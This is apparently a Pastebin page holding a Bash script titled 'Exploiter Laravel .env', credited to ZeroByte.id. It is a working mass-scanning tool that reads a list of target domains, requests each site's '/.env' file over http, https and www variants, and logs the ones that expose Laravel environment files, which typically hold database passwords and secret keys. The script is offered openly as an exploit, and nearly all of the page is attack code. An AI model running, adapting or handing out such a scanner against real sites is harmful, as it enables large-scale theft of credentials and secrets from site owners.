API tools faq
paste
Advertisement
zerobyte-id

Exploiter Laravel .env v.1

zerobyte-id
Feb 17th, 2018
1,921
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.08 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. # Auto Exploit Laravel .env
  3. # Coded by ZeroByte.id
  4. # https://zerobyte.id/ - https://blog.zerobyte.id/
  5.  
  6. function exploitwww() {
  7.     target=$s;
  8.     wtp="https://www.$target";
  9.     #echo $wtp
  10.     w=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $wtp'/.env');
  11.     if [[ $w =~ 'APP_ENV' ]]; then
  12.         echo "[OK] $target/.env";
  13.         echo "$target/.env" >> result.txt
  14.     else
  15.         echo "[BAD] $target";
  16.     fi
  17. }
  18. function exploit() {
  19.     target=$s;
  20.     htp="http://$target"
  21.     e=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $htp'/.env');
  22.     if [[ $e =~ 'APP_ENV' ]]; then
  23.         echo "[OK] $target/.env";
  24.         echo "$target/.env" >> result.txt
  25.     else
  26.         echo "[BAD] $target";
  27.     fi
  28. }
  29. function exploithttps() {
  30.     target=$s;
  31.     hts="https://$target"
  32.     a=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $hts'/.env');
  33.     if [[ $a =~ 'APP_ENV' ]]; then
  34.         echo "[OK] $target/.env";
  35.         echo "$target/.env" >> result.txt
  36.     elif [[ $a =~ 'Moved Permanently' ]]; then
  37.         exploitwww $target
  38.     else
  39.         echo "[BAD] $target";
  40.     fi
  41. }
  42. cat << "banner"
  43.  _____              _           _         _     _
  44. |__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  45.   / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  46.  / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  47. /____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  48.                           |___/                  
  49. -------------------------------------------------
  50. -------- Laravel Environment Exploiter ----------
  51. -------------------------------------------------
  52. Usage : ./laravel.sh list.txt
  53.  
  54. banner
  55. for s in $(cat $1); do
  56.     target=$s;
  57.     g=$(curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" -w %{http_code} $target -o /dev/null);
  58.     if [[ $g =~ '200' ]]; then
  59.         exploit $s
  60.     elif [[ $g =~ '301' ]]; then
  61.         exploithttps $s
  62.     else
  63.         echo "[UNKNOWN] => $target"
  64.     fi
  65. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!